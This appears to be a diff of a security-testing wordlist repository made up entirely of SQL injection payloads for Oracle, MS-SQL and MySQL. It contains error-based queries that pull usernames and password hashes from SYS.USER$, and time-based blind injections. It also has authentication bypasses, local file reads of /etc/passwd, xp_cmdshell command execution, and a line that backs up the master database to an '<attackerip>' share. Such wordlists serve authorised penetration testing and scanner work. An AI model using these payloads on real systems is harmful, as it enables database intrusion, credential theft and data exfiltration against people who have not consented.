' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|
||||
|
193
attack/sql-injection/detect/xplatform.txt
Normal file
193
attack/sql-injection/detect/xplatform.txt
Normal file
|
@ -0,0 +1,193 @@
|
|||
<>"'%;)(&+
|
||||
|
|
||||
!
|
||||
?
|
||||
/
|
||||
//
|
||||
//*
|
||||
'
|
||||
' --
|
||||
(
|
||||
)
|
||||
*|
|
||||
*/*
|
||||
&
|
||||
0
|
||||
031003000270000
|
||||
0 or 1=1
|
||||
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
||||
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||||
1 or 1=1
|
||||
1;SELECT%20*
|
||||
1 waitfor delay '0:0:10'--
|
||||
'%20or%20''='
|
||||
'%20or%201=1
|
||||
')%20or%20('x'='x
|
||||
'%20or%20'x'='x
|
||||
%20or%20x=x
|
||||
%20'sleep%2050'
|
||||
%20$(sleep%2050)
|
||||
%21
|
||||
23 OR 1=1
|
||||
%26
|
||||
%27%20or%201=1
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
%7C
|
||||
a'
|
||||
admin' or '
|
||||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||||
' and 1 in (select var from temp)--
|
||||
anything' OR 'x'='x
|
||||
"a"" or 1=1--"
|
||||
a' or 1=1--
|
||||
"a"" or 3=3--"
|
||||
a' or 3=3--
|
||||
a' or 'a' = 'a
|
||||
'%20OR
|
||||
as
|
||||
asc
|
||||
a' waitfor delay '0:0:10'--
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
bfilename
|
||||
char%4039%41%2b%40SELECT
|
||||
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
||||
declare @q nvarchar (4000) select @q =
|
||||
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
||||
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
declare @s varchar(22) select @s =
|
||||
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
||||
delete
|
||||
desc
|
||||
distinct
|
||||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||
exec(@s)
|
||||
'; exec ('sel' + 'ect us' + 'er')
|
||||
exec sp
|
||||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||||
exec xp
|
||||
'; exec xp_regread
|
||||
' group by userid having 1=1--
|
||||
handler
|
||||
having
|
||||
' having 1=1--
|
||||
hi or 1=1 --"
|
||||
hi' or 1=1 --
|
||||
"hi"") or (""a""=""a"
|
||||
hi or a=a
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
'hi' or 'x'='x';
|
||||
insert
|
||||
like
|
||||
limit
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
or
|
||||
' or ''='
|
||||
or 0=0 #"
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
' or 1 --'
|
||||
' or 1/*
|
||||
; or '1'='1'
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or 1=1
|
||||
' or 1=1 /*
|
||||
' or 1=1--
|
||||
' or 1=1--
|
||||
'/**/or/**/1/**/=/**/1
|
||||
‘ or 1=1 --
|
||||
" or 1=1--
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1 or ""=
|
||||
' or 1=1 or ''='
|
||||
' or 1 in (select @@version)--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 2 > 1
|
||||
' or 2 between 1 and 3
|
||||
' or 3=3
|
||||
‘ or 3=3 --
|
||||
' or '7659'='7659
|
||||
or a=a
|
||||
or a = a
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
) or (a=a
|
||||
order by
|
||||
' or (EXISTS)
|
||||
or isNULL(1/0) /*
|
||||
" or isNULL(1/0) /*
|
||||
' or 'something' like 'some%'
|
||||
' or 'something' = 'some'+'thing'
|
||||
' or 'text' = n'text'
|
||||
' or 'text' > 't'
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or 'unusual' = 'unusual'
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or username like char(37);
|
||||
' or 'whatever' in ('whatever')
|
||||
' -- &password=
|
||||
password:*/=1--
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
procedure
|
||||
replace
|
||||
select
|
||||
' select * from information_schema.tables--
|
||||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||||
' (select top 1
|
||||
--sp_password
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
'sqlvuln
|
||||
'+sqlvuln
|
||||
(sqlvuln)
|
||||
sqlvuln;
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
to_timestamp_tz
|
||||
truncate
|
||||
tz_offset
|
||||
' UNION ALL SELECT
|
||||
' union all select @@version--
|
||||
' union select
|
||||
uni/**/on sel/**/ect
|
||||
' UNION SELECT
|
||||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||||
) union select * from information_schema.tables;
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
update
|
||||
'||UTL_HTTP.REQUEST
|
||||
,@variable
|
||||
@variable
|
||||
@var select @var as var into temp end --
|
||||
\x27UNION SELECT
|
||||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||||
x' AND email IS NULL; --
|
||||
x' AND members.email IS NULL; --
|
||||
x' AND userid IS NULL; --
|
||||
x' or 1=1 or 'x'='y
|
||||
x' OR full_name LIKE '%Bob%
|
||||
ý or 1=1 --
|
11
attack/sql-injection/exploit/ms-sql-enumeration.txt
Normal file
11
attack/sql-injection/exploit/ms-sql-enumeration.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
select @@version
|
||||
select @@servernamee
|
||||
select @@microsoftversione
|
||||
select * from master..sysserverse
|
||||
select * from sysusers
|
||||
exec master..xp_cmdshell 'ipconfig+/all'
|
||||
exec master..xp_cmdshell 'net+view'
|
||||
exec master..xp_cmdshell 'net+users'
|
||||
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
|
@ -0,0 +1,5 @@
|
|||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
1
attack/sql-injection/exploit/mysql-read-local-files.txt
Normal file
1
attack/sql-injection/exploit/mysql-read-local-files.txt
Normal file
|
@ -0,0 +1 @@
|
|||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
|
@ -0,0 +1,107 @@
|
|||
)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
)%20waitfor%20delay%20'0:0:20'%20--
|
||||
')%20waitfor%20delay%20'0:0:20'%20/*
|
||||
')%20waitfor%20delay%20'0:0:20'%20--
|
||||
")%20waitfor%20delay%20'0:0:20'%20/*
|
||||
")%20waitfor%20delay%20'0:0:20'%20--
|
||||
))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
))%20waitfor%20delay%20'0:0:20'%20--
|
||||
'))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'))%20waitfor%20delay%20'0:0:20'%20--
|
||||
"))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"))%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||
',NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
|
@ -0,0 +1,40 @@
|
|||
waitfor delay '0:0:20' /*
|
||||
waitfor delay '0:0:20' --
|
||||
' waitfor delay '0:0:20' /*
|
||||
' waitfor delay '0:0:20' --
|
||||
" waitfor delay '0:0:20' /*
|
||||
" waitfor delay '0:0:20' --
|
||||
) waitfor delay '0:0:20' /*
|
||||
) waitfor delay '0:0:20' --
|
||||
)) waitfor delay '0:0:20' /*
|
||||
)) waitfor delay '0:0:20' --
|
||||
))) waitfor delay '0:0:20' /*
|
||||
))) waitfor delay '0:0:20' --
|
||||
)))) waitfor delay '0:0:20' /*
|
||||
)))) waitfor delay '0:0:20' --
|
||||
))))) waitfor delay '0:0:20' --
|
||||
)))))) waitfor delay '0:0:20' --
|
||||
') waitfor delay '0:0:20' /*
|
||||
') waitfor delay '0:0:20' --
|
||||
") waitfor delay '0:0:20' /*
|
||||
") waitfor delay '0:0:20' --
|
||||
')) waitfor delay '0:0:20' /*
|
||||
')) waitfor delay '0:0:20' --
|
||||
")) waitfor delay '0:0:20' /*
|
||||
")) waitfor delay '0:0:20' --
|
||||
'))) waitfor delay '0:0:20' /*
|
||||
'))) waitfor delay '0:0:20' --
|
||||
"))) waitfor delay '0:0:20' /*
|
||||
"))) waitfor delay '0:0:20' --
|
||||
')))) waitfor delay '0:0:20' /*
|
||||
')))) waitfor delay '0:0:20' --
|
||||
")))) waitfor delay '0:0:20' /*
|
||||
")))) waitfor delay '0:0:20' --
|
||||
'))))) waitfor delay '0:0:20' /*
|
||||
'))))) waitfor delay '0:0:20' --
|
||||
"))))) waitfor delay '0:0:20' /*
|
||||
"))))) waitfor delay '0:0:20' --
|
||||
')))))) waitfor delay '0:0:20' /*
|
||||
')))))) waitfor delay '0:0:20' --
|
||||
")))))) waitfor delay '0:0:20' /*
|
||||
")))))) waitfor delay '0:0:20' --
|
|
@ -0,0 +1,90 @@
|
|||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
